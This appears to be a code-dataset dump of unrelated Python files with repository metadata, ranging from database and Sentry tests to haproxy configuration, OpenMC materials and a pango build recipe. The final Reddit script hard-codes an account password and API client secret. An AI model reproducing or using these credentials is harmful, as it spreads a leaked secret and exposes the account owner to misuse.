37cd552de8fb3f30157326a22a6b5cd62bd74703
|
53406cac38c27960e863c7bd5366bd1ae01ecd6c
|
refs/heads/main
| 2023-02-19T00:36:52.548150
| 2021-01-23T03:40:20
| 2021-01-23T03:40:20
| 326,993,103
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 469
|
py
|
import pymongo
# 创建对象,连接本地数据库。
# 方法一:
client = pymongo.MongoClient()
# 方法二:
client = pymongo.MongoClient('localhost', 27017)
# 方法三:
client = pymongo.MongoClient('mongodb://localhost:27017/')
# 连接DB数据库
db = client['DB']
# 连接集合user,集合类似关系数据库的数据表
# 如果集合不存在,会新建集合user
user_collection = db.user
# 设置文档格式(文档即我们常说的数据)
|
[
"zxdsw199182@gmail.com"
] |
zxdsw199182@gmail.com
|
12598f014099deae48cea3f0402d007713858b5a
|
1fc45a47f0e540941c87b04616f3b4019da9f9a0
|
/tests/sentry/api/serializers/test_grouptagvalue.py
|
d328f092a3656452391add7aa2fc5d6ee396d281
|
[
"BSD-2-Clause"
] |
permissive
|
seukjung/sentry-8.15.0
|
febc11864a74a68ddb97b146cc1d2438ef019241
|
fd3cab65c64fcbc32817885fa44df65534844793
|
refs/heads/master
| 2022-10-28T06:39:17.063333
| 2018-01-17T12:31:55
| 2018-01-17T12:31:55
| 117,833,103
| 0
| 0
|
BSD-3-Clause
| 2022-10-05T18:09:54
| 2018-01-17T12:28:13
|
Python
|
UTF-8
|
Python
| false
| false
| 1,697
|
py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import six
from sentry.api.serializers import serialize
from sentry.models import EventUser, GroupTagValue, TagValue
from sentry.testutils import TestCase
class GroupTagValueSerializerTest(TestCase):
def test_with_user(self):
user = self.create_user()
project = self.create_project()
euser = EventUser.objects.create(
project=project,
email='foo@example.com',
)
tagvalue = TagValue.objects.create(
project=project,
key='sentry:user',
value=euser.tag_value,
)
grouptagvalue = GroupTagValue.objects.create(
project=project,
group=self.create_group(project=project),
key=tagvalue.key,
value=tagvalue.value,
)
result = serialize(grouptagvalue, user)
assert result['id'] == six.text_type(grouptagvalue.id)
assert result['key'] == 'user'
assert result['value'] == grouptagvalue.value
assert result['name'] == euser.get_label()
def test_with_no_tagvalue(self):
user = self.create_user()
project = self.create_project()
grouptagvalue = GroupTagValue.objects.create(
project=project,
group=self.create_group(project=project),
key='sentry:user',
value='email:foo@example.com',
)
result = serialize(grouptagvalue, user)
assert result['id'] == six.text_type(grouptagvalue.id)
assert result['key'] == 'user'
assert result['value'] == grouptagvalue.value
assert result['name'] == grouptagvalue.value
|
[
"jeyce@github.com"
] |
jeyce@github.com
|
d96347873e9e35694bfbbc5d8c3adf35d0c11a59
|
157d0810d40bbb165889f946566346663cf5b22f
|
/Python-For-Everyone-Horstmann/Chapter9-Objects-and-Classes/P9_25.py
|
4f372df40188975237fd47929d3e6603486ef014
|
[] |
no_license
|
dg5921096/Books-solutions
|
e6ccdcaba0294bdc95e2267723a02d2ba090cb10
|
31bb4bba240bf95aafeb6d189eade62c66a1765a
|
refs/heads/master
| 2021-12-09T16:07:47.756390
| 2021-11-14T07:09:25
| 2021-11-14T07:09:25
| 255,447,147
| 0
| 0
| null | 2020-04-13T21:39:02
| 2020-04-13T21:39:01
| null |
UTF-8
|
Python
| false
| false
| 794
|
py
|
# Design a class Mailbox that stores e-mail messages, using the Message class of Exercise
# P9.24. Implement the following methods:
# • def addMessage(self, message)
# • def getMessage(self, index)
# • def removeMessage(self, index)
class Mailbox():
def __init__(self):
self._mails = []
def list_messages(self):
output = []
for i, message in enumerate(self._mails):
output.append("[{}] From: {}, To: {}".format(i, message.get_sender(), message.get_recipient()))
return "\n".join(output)
def add_message(self, message_object):
self._mails.append(message_object)
def get_message(self, index):
return self._mails[index].to_string()
def remove_message(self, index):
del self._mails[index]
|
[
"syndbe@gmail.com"
] |
syndbe@gmail.com
|
69125d0d670089b391b47812638b43f7c459c0b5
|
396f93d8e73c419ef82a94174815a2cecbb8334b
|
/.history/tester2_20200322174510.py
|
7aa63cf5264177dcd88e4e6fbb297d2a899aa036
|
[] |
no_license
|
mirfarzam/ArtificialIntelligence-HeuristicAlgorithm-TabuSearch
|
8c73d9448b916009c9431526864a4441fdeb682a
|
90b2dca920c85cddd7c1b3335344ac7b10a9b061
|
refs/heads/master
| 2021-03-26T21:16:42.561068
| 2020-04-17T21:44:26
| 2020-04-17T21:44:26
| 247,750,502
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,365
|
py
|
import os
import subprocess
import re
from datetime import datetime
import time
from statistics import mean
numberOfTests = 100
tabuIteration = '1000'
tabuDuration = '40'
numberOfCities = '50'
final_solution = []
list_coverage = []
local_minimum = []
print(f"\n\nTest for Tabu Search with this config: \n\tIterations : {tabuIteration} \n\tDuration(Tabu Memory): {tabuDuration} \n\tNumber of Cities: {numberOfCities}")
for i in range(0, numberOfTests):
process = subprocess.Popen(['./algo_tabou.exe', tabuIteration , tabuDuration, numberOfCities, 'distances_entre_villes_{}.txt'.format(numberOfCities)],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
result = stdout
result = re.sub(r'\s', ' ', str(result))
solution = (re.findall(r'([0-9]{4,7}) km', result))[-1]
final_solution.append(int(solution))
coverage = re.findall(r'On est dans un minimum local a l\'iteration ([0-9]+) ->', result)
if coverage != []:
coverage = int(coverage[0])+ 1
if int(solution) != 5644:
local_minimum.append(int(solution))
else:
coverage = int(tabuIteration)
number_of_solution_before_coverage = coverage
list_coverage.append(coverage)
print('{} : best found solution is {} and found in interation {}, number of solutions before coverage : {}'.format(i, solution, coverage, number_of_solution_before_coverage))
time.sleep( 1 )
print("Summary:")
optimum_result = len(list(filter(lambda x: x == 5644, final_solution)))
print(f'number of optimum solution found is {optimum_result}, so in {numberOfTests} runs of test we faced {(optimum_result/numberOfTests)*100}% coverage')
print(f'in average this test shows that we found the global optimum solution in iteration {mean(list_coverage)}\nand in worst we found it in iteration {max(list_coverage)} \nand in best case in iteration {max(list_coverage)}')
print(f'Totally, {sum(list_coverage)} cities visited before finding the global optimum in {numberOfTests} runs of this test\n\n\n')
unique_local_minimum = list(dict.fromkeys(local_minimum))
print(f'totally the algorithm was stuck in local optimum {len(local_minimum)} times \nthere are {len(unique_local_minimum)} unique local minimum \nthe best local optimum is {min(unique_local_minimum)} \nthe worst local optimum is {max(unique_local_minimum)}')
|
[
"farzam.mirmoeini@gmail.com"
] |
farzam.mirmoeini@gmail.com
|
8920f1e323513222adafbd77853f23a6f87ca1e2
|
d3efc82dfa61fb82e47c82d52c838b38b076084c
|
/Autocase_Result/GPMM/YW_GPMM_SZSJ_287.py
|
dd5bdfe7fc378edf0289633f7e8debff4b950338
|
[] |
no_license
|
nantongzyg/xtp_test
|
58ce9f328f62a3ea5904e6ed907a169ef2df9258
|
ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f
|
refs/heads/master
| 2022-11-30T08:57:45.345460
| 2020-07-30T01:43:30
| 2020-07-30T01:43:30
| 280,388,441
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,063
|
py
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test/service")
from ServiceConfig import *
from mainService import *
from QueryStkPriceQty import *
from log import *
sys.path.append("/home/yhl2/workspace/xtp_test/mysql")
from CaseParmInsertMysql import *
sys.path.append("/home/yhl2/workspace/xtp_test/utils")
from QueryOrderErrorMsg import queryOrderErrorMsg
class YW_GPMM_SZSJ_287(xtp_test_case):
# YW_GPMM_SZSJ_287
def test_YW_GPMM_SZSJ_287(self):
title = '深A本方最优卖(卖出数量=可用股份数+100)'
# 定义当前测试用例的期待值
# 期望状态:初始、未成交、部成、全成、部撤已报、部撤、已报待撤、已撤、废单、撤废、内部撤单
# xtp_ID和cancel_xtpID默认为0,不需要变动
case_goal = {
'期望状态': '废单',
'errorID': 11010121,
'errorMSG': queryOrderErrorMsg(11010121),
'是否生成报单': '是',
'是否是撤废': '否',
'xtp_ID': 0,
'cancel_xtpID': 0,
}
logger.warning(title)
# 定义委托参数信息------------------------------------------
# 参数:证券代码、市场、证券类型、证券状态、交易状态、买卖方向(B买S卖)、期望状态、Api
stkparm = QueryStkPriceQty('003123', '2', '0', '2', '0', 'S', case_goal['期望状态'], Api)
# 如果下单参数获取失败,则用例失败
if stkparm['返回结果'] is False:
rs = {
'用例测试结果': stkparm['返回结果'],
'测试错误原因': '获取下单参数失败,' + stkparm['错误原因'],
}
self.assertEqual(rs['用例测试结果'], True)
else:
wt_reqs = {
'business_type': Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_CASH'],
'order_client_id':trade_type + 1,
'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SZ_A'],
'ticker': stkparm['证券代码'],
'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_SELL'],
'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_FORWARD_BEST'],
'price': stkparm['涨停价'],
'quantity': 100100,
'position_effect': Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT']
}
ParmIni(Api, case_goal['期望状态'], wt_reqs['price_type'])
CaseParmInsertMysql(case_goal, wt_reqs)
rs = serviceTest(Api, case_goal, wt_reqs)
logger.warning('执行结果为' + str(rs['用例测试结果']) + ','
+ str(rs['用例错误源']) + ',' + str(rs['用例错误原因']))
self.assertEqual(rs['用例测试结果'], True) # 0
if __name__ == '__main__':
unittest.main()
|
[
"418033945@qq.com"
] |
418033945@qq.com
|
987ab0b6c6d56227783ce5d319a505c1c5526fbf
|
aa64c62a3d246b87f3f1e5810a8f75b1d166aaf6
|
/paradrop/daemon/paradrop/core/config/haproxy.py
|
fc29f54f582c5117987eb8e786324404287cdf69
|
[
"Apache-2.0"
] |
permissive
|
ParadropLabs/Paradrop
|
ca40b3373c0732c781f9c10d38da9b6e9fbd3453
|
c910fd5ac1d1b5e234f40f9f5592cc981e9bb5db
|
refs/heads/master
| 2023-02-26T17:51:53.058300
| 2022-03-01T17:46:10
| 2022-03-01T17:46:10
| 37,789,450
| 88
| 31
|
Apache-2.0
| 2023-02-16T05:24:46
| 2015-06-20T23:18:38
|
Python
|
UTF-8
|
Python
| false
| false
| 5,061
|
py
|
"""
This module is responsible for configuration haproxy.
"""
import os
import subprocess
from paradrop.base import settings
from paradrop.core.chute.chute_storage import ChuteStorage
from paradrop.core.container.chutecontainer import ChuteContainer
def generateConfigSections():
sections = []
sections.append({
"header": "global",
"lines": [
"daemon",
"maxconn 256",
]
})
sections.append({
"header": "defaults",
"lines": [
"mode http",
"timeout connect 5000ms",
"timeout client 50000ms",
"timeout server 50000ms"
]
})
sections.append({
"header": "backend portal",
"lines": [
"server pd_portal 127.0.0.1:8080 maxconn 256"
]
})
# Custom variables:
# - req.querymarker: will be set to the literal "?" if the original request
# contains a query string. We will use this to construct a redirect with a
# query string only if needed.
# - req.subpath: will be set to the remainder of the path, if anything,
# after removing /chutes/<chutename>, e.g. "/chutes/hello-world/index.html"
# becomes "/index.html". This does not include the query string.
frontend = {
"header": "frontend http-in",
"lines": [
"bind *:80",
"default_backend portal",
"http-request set-var(req.querymarker) str(?) if { query -m found }",
"http-request set-var(req.subpath) path,regsub(^/chutes/[^/]+,)"
]
}
sections.append(frontend)
chuteStore = ChuteStorage()
chutes = chuteStore.getChuteList()
for chute in chutes:
port, service = chute.get_web_port_and_service()
if port is None or service is None:
continue
container = ChuteContainer(service.get_container_name())
if not container.isRunning():
continue
# Generate a rule that matches HTTP host header to chute name.
frontend['lines'].append("acl host_{} hdr(host) -i {}.chute.paradrop.org".format(
chute.name, chute.name))
frontend['lines'].append("use_backend {} if host_{}".format(
chute.name, chute.name))
# Generate rules that matches the beginning of the URL.
# We need to be careful and either have an exact match
# or make sure there is a slash or question mark after the chute name
# to avoid mix-ups, e.g. "sticky-board" and "sticky-board-new".
frontend['lines'].append("acl path_{} url /chutes/{}".format(
chute.name, chute.name))
frontend['lines'].append("acl path_{} url_beg /chutes/{}/".format(
chute.name, chute.name))
frontend['lines'].append("acl path_{} url_beg /chutes/{}?".format(
chute.name, chute.name))
# Try to find a host binding for the web port to redirect:
# http://<host addr>/chutes/<chute>/<path> ->
# http://<host addr>:<chute port>/<path>
#
# We need to do a lookup because the host port might be dynamically
# assigned by Docker.
#
# Use HTTP code 302 for the redirect, which will not be cached by the
# web browser. The port portion of the URL can change whenever the
# chute restarts, so we don't want web browsers to cache it. Browsers
# will cache a 301 (Moved Permanently) response.
portconf = container.getPortConfiguration(port, "tcp")
if len(portconf) > 0:
# TODO: Are there other elements in the list?
binding = portconf[0]
frontend['lines'].append("http-request replace-value Host (.*):(.*) \\1")
frontend['lines'].append("http-request redirect location http://%[req.hdr(host)]:{}%[var(req.subpath)]%[var(req.querymarker)]%[query] code 302 if path_{}".format(
binding['HostPort'], chute.name))
# Add a server at the chute's IP address.
sections.append({
"header": "backend {}".format(chute.name),
"lines": [
"server {} {}:{} maxconn 256".format(chute.name,
container.getIP(), port)
]
})
return sections
def writeConfigFile(output):
sections = generateConfigSections()
for section in sections:
output.write(section['header'] + "\n")
for line in section['lines']:
output.write(" " + line + "\n")
output.write("\n")
def reconfigureProxy(update):
"""
Reconfigure haproxy with forwarding and redirect rules.
"""
confFile = os.path.join(settings.RUNTIME_HOME_DIR, "haproxy.conf")
pidFile = os.path.join(settings.TMP_DIR, "haproxy.pid")
with open(confFile, "w") as output:
writeConfigFile(output)
cmd = ["haproxy", "-f", confFile, "-p", pidFile]
if os.path.exists(pidFile):
with open(pidFile, "r") as source:
pid = source.read().strip()
cmd.extend(["-sf", pid])
subprocess.call(cmd)
|
[
"hartung@cs.wisc.edu"
] |
hartung@cs.wisc.edu
|
09db562a43a4de24b3c2c642181d463e0a4b80ae
|
6d9795fa1aafc0fa5316020aaa0eaa4f68b76229
|
/sellproperty/models.py
|
63aa8f893cb9dcbfbd6429438758eeac799571cd
|
[] |
no_license
|
icerahi/immolists
|
02d379a22c193e793b26e35828b5eebff33bf888
|
813333c3923385861f111bb7aa715aeb04108c3a
|
refs/heads/master
| 2022-12-15T15:00:39.844142
| 2022-01-06T10:06:44
| 2022-01-06T10:06:44
| 196,600,572
| 0
| 0
| null | 2022-11-22T04:14:43
| 2019-07-12T15:12:33
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 6,052
|
py
|
import os
import random
from django.contrib.auth.models import User
from django.db import models
# Create your models here.
from ckeditor.fields import RichTextField
from ckeditor_uploader.fields import RichTextUploadingField
from django.conf import settings
from django.db import models
from django.db.models.signals import pre_save
from django.dispatch import receiver
from django.urls import reverse
from django.utils.text import slugify
from djmoney.models.fields import MoneyField
from phonenumber_field.modelfields import PhoneNumberField
from embed_video.fields import EmbedVideoField
from places.fields import PlacesField
class Category(models.Model):
name=models.CharField(max_length=200,unique=True,)
def __str__(self):
return f"{self.name}"
class Type(models.Model):
name=models.CharField(max_length=200,unique=True)
category=models.ForeignKey(Category,related_name='category',on_delete=models.CASCADE)
def __str__(self):
return f"{self.name}"
class PublishedManager(models.Manager):
def get_queryset(self):
return super(PublishedManager, self).get_queryset().filter(status='published')
class AllObjectManager(models.Manager):
def get_queryset(self):
return super(AllObjectManager, self).get_queryset()
def get_filename_extention(filepath):
base_name=os.path.basename(filepath)
name,ext=os.path.splitext(base_name)
return name,ext
def upload_image_path(instance,filename):
new_filename=random.randint(1,1234567876543211)
name,ext=get_filename_extention(filename)
final_filename='{new_filename}{ext}'.format(new_filename=filename,ext=ext)
return 'sellproperty/{new_filename}/{final_filename}'.format(
new_filename=new_filename,
final_filename=final_filename
)
class SellProperty(models.Model):
STATUS_CHOICES=(
('draf','Draft'),
('published','Published')
)
ACTION_FOR=(('sale','Sale',),
('rent','Rent')
)
RENT_PER=(("nothing","One Time Price (For sale)"),
('month','PER MONTH'),
('year','PER YEAR'))
realator = models.ForeignKey(settings.AUTH_USER_MODEL,on_delete=models.CASCADE)
category =models.ForeignKey(Category,on_delete=models.CASCADE)
type =models.ForeignKey(Type,on_delete=models.CASCADE)
title =models.CharField(max_length=200)
full_description =RichTextUploadingField()
key_features =RichTextField()
min_price = MoneyField(max_digits=14, decimal_places=2, default_currency='USD')
max_price = MoneyField(max_digits=14, decimal_places=2, default_currency='USD')
created =models.DateTimeField(auto_now_add=True)
updated =models.DateTimeField(auto_now=True)
slug = models.SlugField()
status =models.CharField(max_length=12,choices=STATUS_CHOICES,default='published')
published =PublishedManager() #Costom model manager
objects =AllObjectManager() # Costom model manager
main_image =models.ImageField(upload_to=upload_image_path,default='default.jpg')
image_2 =models.ImageField(upload_to=upload_image_path,null=True,blank=True)
image_3 =models.ImageField(upload_to=upload_image_path,null=True,blank=True)
views = models.PositiveIntegerField(default=0, blank=True)
favourite =models.ManyToManyField(settings.AUTH_USER_MODEL,blank=True,related_name='favourite')
video = EmbedVideoField(null=True,blank=True)
action =models.CharField(max_length=6,choices=ACTION_FOR)
rent_per =models.CharField(max_length=30,choices=RENT_PER,null=True,blank=True)
location = PlacesField(blank=True)
def __unicode__(self):
return self.location.place
def __str__(self):
return f"{self.title}"
class Meta:
ordering=['-created']
def get_update_url(self,*args,**kwargs):
return reverse('dashboard:sell_update',kwargs={'pk':self.pk,'slug':self.slug})
def get_delete_url(self,*args,**kwargs):
return reverse('dashboard:sell_delete',kwargs={'pk':self.pk,'slug':self.slug})
def get_absolute_url(self,*args,**kwargs):
return reverse('site:detail',kwargs={'pk':self.pk,'slug':self.slug})
@receiver(pre_save,sender=SellProperty)
def pre_save_slug(sender,**kwargs):
slug=slugify(kwargs['instance'].title)
kwargs['instance'].slug=slug
class EnquiryManager(models.Manager):
def get_come(self,user):
return super(EnquiryManager, self).get_queryset().filter(property__realator=user)
def get_send(self,user):
return super(EnquiryManager, self).get_queryset().filter(email=user.email)
class Enquiry(models.Model):
property=models.ForeignKey(SellProperty,on_delete=models.CASCADE,related_name='enquiry')
name =models.CharField(max_length=100,blank=False,null=False)
email=models.EmailField(blank=False,null=False)
phone=PhoneNumberField(blank=True,null=True)
message=models.TextField(blank=False,null=False)
time =models.DateTimeField(auto_now_add=True)
objects=EnquiryManager()
def __str__(self):
return f'{self.name}'
class Meta:
ordering=['-time']
def get_come_delete_url(self,*args,**kwargs):
return reverse('dashboard:enquirycome_delete',kwargs={'pk':self.pk})
def get_send_delete_url(self,*args,**kwargs):
return reverse('dashboard:enquirysend_delete',kwargs={'pk':self.pk})
class MakeOffer(models.Model):
property=models.ForeignKey(SellProperty,on_delete=models.CASCADE,related_name='make_offer')
discount=models.DecimalField(max_digits=3,decimal_places=0)
time=models.DateTimeField(auto_now_add=True)
objects=AllObjectManager()
def get_delete_url(self,*args,**kwargs):
return reverse('dashboard:offer_remove',kwargs={
'pk':self.pk,
})
def __str__(self):
return f'{self.discount}'
class Meta:
ordering=['-time']
|
[
"zanjarwhite@gmail.com"
] |
zanjarwhite@gmail.com
|
f6cbe10ec60a3e67c3d01909eb6787f81d784725
|
52b5fa23f79d76883728d8de0bfd202c741e9c43
|
/kubernetes/test/test_v1_horizontal_pod_autoscaler.py
|
315840a3d5385881407d0c8128db6c771a02de99
|
[] |
no_license
|
kippandrew/client-python-tornado
|
5d00810f57035825a84e37ff8fc89a7e79aed8da
|
d479dfeb348c5dd2e929327d800fe033b5b3b010
|
refs/heads/master
| 2021-09-04T13:01:28.275677
| 2018-01-18T23:27:34
| 2018-01-18T23:27:34
| 114,912,995
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,037
|
py
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: v1.8.6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import kubernetes.client
from kubernetes.client.models.v1_horizontal_pod_autoscaler import V1HorizontalPodAutoscaler # noqa: E501
from kubernetes.client.rest import ApiException
class TestV1HorizontalPodAutoscaler(unittest.TestCase):
"""V1HorizontalPodAutoscaler unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testV1HorizontalPodAutoscaler(self):
"""Test V1HorizontalPodAutoscaler"""
# FIXME: construct object with mandatory attributes with example values
# model = kubernetes.client.models.v1_horizontal_pod_autoscaler.V1HorizontalPodAutoscaler() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"andy@rstudio.com"
] |
andy@rstudio.com
|
89e06687f93fce54b05689e3792cc5692934b929
|
da497ddf926b8791f3812c79543120215822216b
|
/icsbep/pu-sol-therm-012/openmc/case-14/generate_materials.py
|
8eab1d8d6513479d03829680991c284d7261e01d
|
[] |
no_license
|
mit-crpg/benchmarks
|
55f38e569699554d07df254103e2f828dc5b4ff8
|
58e15679ec684b9e2f552df58099e3648b5708cc
|
refs/heads/master
| 2022-05-17T12:27:45.590757
| 2022-05-09T15:07:00
| 2022-05-09T15:07:00
| 2,704,358
| 23
| 30
| null | 2019-11-11T16:35:27
| 2011-11-03T19:04:29
|
Python
|
UTF-8
|
Python
| false
| false
| 1,822
|
py
|
import openmc
mats = openmc.Materials()
mat = openmc.Material(1)
mat.name = "Plutonium nitrate solution (52.7 g/L)"
mat.set_density('sum')
mat.add_nuclide('Pu239', 9.86655e-05)
mat.add_nuclide('Pu240', 2.50004e-05)
mat.add_nuclide('Pu241', 7.41089e-06)
mat.add_nuclide('Pu242', 1.49702e-06)
mat.add_nuclide('Am241', 8.03099e-07)
mat.add_element('N', 1.78497e-03)
mat.add_element('O', 3.59564e-02)
mat.add_nuclide('H1', 6.24015e-02)
mat.add_element('Fe', 1.21850e-05)
mat.add_element('Cr', 3.91841e-06)
mat.add_element('Ni', 2.77719e-06)
mat.add_s_alpha_beta('c_H_in_H2O')
mats.append(mat)
mat = openmc.Material(2)
mat.name = "Air"
mat.set_density('sum')
mat.add_nuclide('O16', 1.0784e-05)
mat.add_nuclide('N14', 4.3090e-05)
mats.append(mat)
mat = openmc.Material(3)
mat.name = "Stainless steel"
mat.set_density('sum')
mat.add_element('Fe', 6.1344e-02)
mat.add_element('Cr', 1.6472e-02)
mat.add_element('Ni', 8.1050e-03)
mats.append(mat)
mat = openmc.Material(4)
mat.name = "Lucoflex"
mat.set_density('sum')
mat.add_element('C', 2.7365e-02)
mat.add_nuclide('H1', 4.1047e-02)
mat.add_element('Cl', 1.3682e-02)
mats.append(mat)
mat = openmc.Material(5)
mat.name = "Water"
mat.set_density('sum')
mat.add_nuclide('H1', 6.6688e-02)
mat.add_element('O', 3.3344e-02)
mat.add_s_alpha_beta('c_H_in_H2O')
mats.append(mat)
mat = openmc.Material(6)
mat.name = "Steel (pool wall)"
mat.set_density('sum')
mat.add_element('Fe', 8.5068e-02)
mat.add_element('C', 5.5545e-04)
mats.append(mat)
mat = openmc.Material(7)
mat.name = "Concrete"
mat.set_density('sum')
mat.add_nuclide('H1', 1.035e-02)
mat.add_nuclide('B10', 1.602e-06)
mat.add_element('O', 4.347e-02)
mat.add_element('Al', 1.563e-03)
mat.add_element('Si', 1.417e-02)
mat.add_element('Ca', 6.424e-03)
mat.add_element('Fe', 7.621e-04)
mats.append(mat)
mats.export_to_xml()
|
[
"paul.k.romano@gmail.com"
] |
paul.k.romano@gmail.com
|
2fc35c78749760c361cd5b6ea2884fc7fd16bb07
|
f8a66f137d53306d1f05db6a2a6a0f4d0bd5acf1
|
/Cyber-Main/JSL_Threat_Intel_Framework_whodat/a.py
|
f08854459bb01f5f6acedb36866ec7d61afe6614
|
[] |
no_license
|
sec-js/JSL-Cyber-ThreatIntelCore
|
5d9e63a5fca0b0d2e250d682332ad86286277205
|
a66c350b42c7ed95a4e3703e82983626fdab8ab7
|
refs/heads/master
| 2020-12-03T12:46:53.319750
| 2017-02-03T19:32:30
| 2017-02-03T19:32:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,957
|
py
|
import csv
def write_final_output(dico):
f = open("outputfile", 'w')
f.write(
'pipelineid' + ',' + 'datauploadid' + ',' + 'uuid' + ',' + 'referential' + ',' + 'datasourcename' + ',' + 'date' + ',' + 'cog' + ',' + 'model' + ',' + 'concept' \
+ ',' + 'segment' + ',' + 'pedigree' + ',' + 'confidence_score' + ',' + 'ipaddress' + ',' + 'ipaddress_int' + ',' + 'offenderclass' + ',' + 'first_observed_date' + ',' + 'first_observed_time' + ',' + \
'most_recent_observation_date' + ',' + 'most_recent_observation_time' + ',' + 'total_observations' + ',' + 'blranking' + ',' + 'threat_score' + ',' + 'total_capabilities' + ',' + \
'commvett' + ',' + 'commdatevett' + ',' + 'govvett' + ',' + 'govdatevett' + ',' + 'countryabbrv' + ',' + 'country' + ',' + 'city' + ',' + 'coordinates' + ',' + 'geo_longitude' + ',' + 'geo_latitude' \
+ ',' + 'isp' + ',' + 'domain' + ',' + 'netspeed' + ',' + 'network_asn' + ',' + 'network_class' + ',' + 'network_type' + ',' + 'active boolean' + ',' + 'insrtdttm' + ',' + 'updtdttm' + '\n')
for entry in dico:
f.write(str(entry['pipelineid']) + ',' + str(entry['datauploadid']) + ',' + str(entry['uuid']) + ',' + str(
entry['referential']) + ',' + str(entry['datasourcename']) + ',' + str(entry['date']) + ',' + str(
entry['cog']) + ',' + str(entry['model']) + ',' + str(entry['concept']) \
+ ',' + str(entry['segment']) + ',' + str(entry['pedigree']) + ',' + str(
entry['confidence_score']) + ',' + str(entry['ipaddress']) + ',' + str(entry['ipaddress_int']) + ',' + str(
entry['offenderclass']) + ',' + str(entry['first_observed_date']) + ',' + str(
entry['first_observed_time']) + ',' + \
str(entry['most_recent_observation_date']) + ',' + str(
entry['most_recent_observation_time']) + ',' + str(entry['total_observations']) + ',' + str(
entry['blranking']) + ',' + str(entry['threat_score']) + ',' + str(entry['total_capabilities']) + ',' + \
str(entry['commvett']) + ',' + str(entry['commdatevett']) + ',' + str(entry['govvett']) + ',' + str(
entry['govdatevett']) + ',' + str(entry['countryabbrv']) + ',' + str(entry['country']) + ',' + str(
entry['city']) + ',' + str(entry['coordinates']) + ',' + str(entry['geo_longitude']) + ',' + str(
entry['geo_latitude']) \
+ ',' + str(entry['isp']) + ',' + str(entry['domain']) + ',' + str(entry['netspeed']) + ',' + str(
entry['network_asn']) + ',' + str(entry['network_class']) + ',' + str(entry['network_type']) + ',' + str(
entry['active boolean']) + ',' + str(entry['insrtdttm']) + ',' + str(entry['updtdttm']) + '\n')
# Load test.csv into a list of per-row dicts keyed by the header line, then
# re-emit it to "outputfile" via write_final_output.
with open('test.csv') as f:
    reader = csv.reader(f, skipinitialspace=True)
    header = next(reader)
    # map(str, ...) is a no-op normalisation: csv already yields strings.
    a = [dict(zip(header, map(str, row))) for row in reader]
write_final_output(a)
|
[
"jonathan@johnsnowlabs.com"
] |
jonathan@johnsnowlabs.com
|
66dc0f2daff11b6cce93fd0485b61c72d2d44f92
|
1adc05008f0caa9a81cc4fc3a737fcbcebb68995
|
/hardhat/recipes/pango.py
|
534919580c9ee2d79f2ed539a86e1db554ea72c2
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
stangelandcl/hardhat
|
4aa995518697d19b179c64751108963fa656cfca
|
1ad0c5dec16728c0243023acb9594f435ef18f9c
|
refs/heads/master
| 2021-01-11T17:19:41.988477
| 2019-03-22T22:18:44
| 2019-03-22T22:18:52
| 79,742,340
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 725
|
py
|
from .base import GnuRecipe
class PangoRecipe(GnuRecipe):
    """Build recipe for pango (GNOME text layout and rendering library)."""

    def __init__(self, *args, **kwargs):
        super(PangoRecipe, self).__init__(*args, **kwargs)
        self.sha256 = '1d2b74cd63e8bd41961f2f8d952355aa' \
                      '0f9be6002b52c8aa7699d9f5da597c9d'
        self.name = 'pango'
        self.depends = ['cairo', 'fontconfig', 'glib', 'harfbuzz']
        self.version = '1.42.4'
        # Raw string: '\d' in a plain literal is an invalid escape sequence
        # (DeprecationWarning since Python 3.6, a SyntaxError in newer
        # releases). The string value itself is unchanged.
        self.version_regex = r'(?P<version>\d+\.\d+)'
        self.version_url = 'http://ftp.gnome.org/pub/GNOME/sources/pango/'
        # Upstream publishes tarballs under the major.minor directory.
        short_version = '.'.join(self.version.split('.')[:2])
        self.url = 'http://ftp.gnome.org/pub/gnome/sources/$name/' \
                   '%s/$name-$version.tar.xz' % short_version
|
[
"clayton.stangeland@gmail.com"
] |
clayton.stangeland@gmail.com
|
c85c460a448c4a63602d3d96b271abbdb9f524f3
|
afbcda99c55aeb26360d593f1abe99afbbb1d1b7
|
/Python/Temppraw/temppraw.py
|
e6309910cf300fdc9d0c9bc4b437f7b346c77495
|
[] |
no_license
|
cstuartroe/misc
|
b4c4fb2f8ef7341acf99f35e9eece1cf3769a0fc
|
307b00c3ab7e51204401e84bd6c4466315889dfe
|
refs/heads/master
| 2023-08-17T19:07:59.535257
| 2023-08-06T16:07:27
| 2023-08-06T16:07:27
| 156,424,382
| 0
| 0
| null | 2022-05-25T02:00:29
| 2018-11-06T17:50:34
|
Java
|
UTF-8
|
Python
| false
| false
| 859
|
py
|
import praw
import time
import datetime  # imported but not used in this snippet

# Epoch timestamp captured at import time; post ages are measured against
# this moment rather than against call time.
current = time.time()
# SECURITY(review): the client secret and account password are hard-coded in
# source control -- these credentials should be rotated and loaded from an
# environment variable or config file instead.
reddit = praw.Reddit(client_id='PTofuEjEjIPbcg',
                     client_secret='_R0b3zmCvjXGPseYbaPIUEnZAlU',
                     password='LinguisticsIsCool208',
                     user_agent='testscript by /u/conor_emily_ling208',
                     username='conor_emily_ling208')
